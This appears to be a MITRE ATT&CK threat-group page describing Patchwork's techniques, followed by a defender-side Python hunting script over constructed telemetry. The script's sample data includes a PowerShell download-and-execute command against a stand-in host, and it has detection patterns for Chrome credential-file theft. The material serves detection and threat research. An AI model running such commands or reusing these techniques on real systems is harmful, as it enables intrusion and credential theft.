Group: Patchwork, Dropping Elephant, Chinastrats

Group ID: G0040
Aliases: Patchwork, Dropping Elephant, Chinastrats

Patchwork is a threat group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. Much of the code used by this group was copied and pasted from online forums.[1][2]

Techniques Used

  • PowerShell - Patchwork used PowerSploit to download and run a reverse shell.[1]
  • System Information Discovery - Patchwork collected the victim computer name, OS version, and architecture type and sent the information to its C2 server.[1]
  • System Owner/User Discovery - Patchwork collected the victim username and whether it was running as admin, then sent the information to its C2 server.[1]
  • Credential Dumping - Patchwork dumped the login data database from \AppData\Local\Google\Chrome\User Data\Default\Login Data.[1]
  • Security Software Discovery - Patchwork scanned the "Program Files" directories for a directory with the string "Total Security" (the installation path of the "360 Total Security" antivirus tool).[1]
  • Masquerading - Patchwork installed its payload in the startup programs folder as "Baidu Software Update." The group also adds its second stage payload to the startup programs as "Net Monitor."[1]
  • File and Directory Discovery - A Patchwork payload has searched all fixed drives on the victim for files matching a specified list of extensions.[1]
  • Process Hollowing - A Patchwork payload uses process hollowing to hide the UAC bypass vulnerability exploitation inside svchost.exe.[1]
  • Remote File Copy - A Patchwork payload downloads additional malware from the C2 server.[3]
  • Web Service - Patchwork hides base64-encoded and encrypted C2 server locations in comments on legitimate websites.[3]
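As an added defender-side example (not part of this ATT&CK page), the Masquerading, Credential Dumping and PowerShell behaviours listed above can be turned into simple hunting checks over endpoint telemetry. The event schema, the sample events, the user and image paths, and the "downloadstring"/"powersploit" command-line indicator are all assumptions constructed for this example; the decoy names and the Chrome Login Data path come from the page.

```python
import re

# Detection heuristics for the Patchwork behaviours listed above, run over
# constructed Sysmon-like telemetry (event dicts below are not real logs).
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+$", re.IGNORECASE)
MASQUERADE_NAMES = {"baidu software update", "net monitor"}   # decoy names from the page
CHROME_LOGIN_DATA = re.compile(
    r"\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data$", re.IGNORECASE)
PS_DOWNLOAD = re.compile(r"downloadstring|powersploit", re.IGNORECASE)  # assumed indicator


def basename(path):
    return path.rsplit("\\", 1)[-1]


def check_event(ev):
    """Return the page-listed technique names a single event matches."""
    hits = []
    kind, image, path = ev.get("event"), ev.get("image", ""), ev.get("path", "")
    # Masquerading: a startup-folder entry using one of the group's decoy names
    if kind == "file_create" and STARTUP_DIR.search(path):
        stem = basename(path).rsplit(".", 1)[0].lower()
        if stem in MASQUERADE_NAMES:
            hits.append("Masquerading")
    # Credential Dumping: Chrome's Login Data read by something other than Chrome
    if kind == "file_access" and CHROME_LOGIN_DATA.search(path):
        if basename(image).lower() != "chrome.exe":
            hits.append("Credential Dumping")
    # PowerShell: powershell.exe pulling code from the network (PowerSploit use)
    if kind == "process_create" and basename(image).lower() == "powershell.exe":
        if PS_DOWNLOAD.search(ev.get("cmdline", "")):
            hits.append("PowerShell")
    return hits


def scan(events):
    """Return (event index, technique) pairs for every match in the stream."""
    return [(i, t) for i, ev in enumerate(events) for t in check_event(ev)]


SAMPLE_EVENTS = [  # constructed sample telemetry
    {"event": "file_create", "image": r"C:\Users\u\Downloads\inv.exe",
     "path": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Baidu Software Update.lnk"},
    {"event": "file_access", "image": r"C:\Users\u\Downloads\inv.exe",
     "path": r"C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"event": "file_access", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"event": "process_create", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s')\""},
    {"event": "file_create", "image": r"C:\Windows\explorer.exe",
     "path": r"C:\Users\u\Documents\notes.txt"},
]

if __name__ == "__main__":
    for idx, technique in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {technique}")
```

The Chrome-reads-its-own-database case (event 2) is deliberately left unflagged so the rule does not fire on every browser start.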